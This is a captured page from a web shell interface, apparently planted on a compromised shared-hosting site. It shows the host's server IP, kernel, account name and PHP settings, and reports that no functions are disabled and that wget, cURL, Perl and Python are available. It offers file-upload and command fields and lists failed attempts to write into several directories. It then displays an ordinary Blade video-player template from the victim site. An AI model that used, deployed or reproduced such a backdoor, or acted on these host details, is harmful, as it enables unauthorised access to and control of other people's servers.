Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 52.15.191.241
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Template/Views/frontend/blocks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Template/Views/frontend/blocks/video-player.blade.php
<div class="container">
    <div class="bravo_gallery">
        <div class="btn-group">
            <span class="btn-transparent has-icon bravo-video-popup" @if($youtube) data-toggle="modal" @endif data-src="{{ str_ireplace("watch?v=","embed/",$youtube) }}" data-target="#video-{{$id}}">
                @if($bg_image)
                    <img src="{{get_file_url($bg_image,'full')}}" class="img-fluid" alt="Youtube">
                @endif
                @if($youtube)
                    <div class="play-icon">
                        <img src="{{asset('module/vendor/img/ico-play.svg')}}" alt="Play background" class="img-fluid play-image">
                    </div>
                @endif
            </span>
        </div>
        @if($youtube)
            <div class="modal fade" id="video-{{$id}}" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
                <div class="modal-dialog modal-lg modal-dialog-centered" role="document">
                    <div class="modal-content p-0">
                        <div class="modal-body">
                            <div class="embed-responsive embed-responsive-16by9">
                                <iframe class="embed-responsive-item bravo_embed_video" src="{{ handleVideoUrl($youtube) }}" allowscriptaccess="always" allow="autoplay"></iframe>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        @endif
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit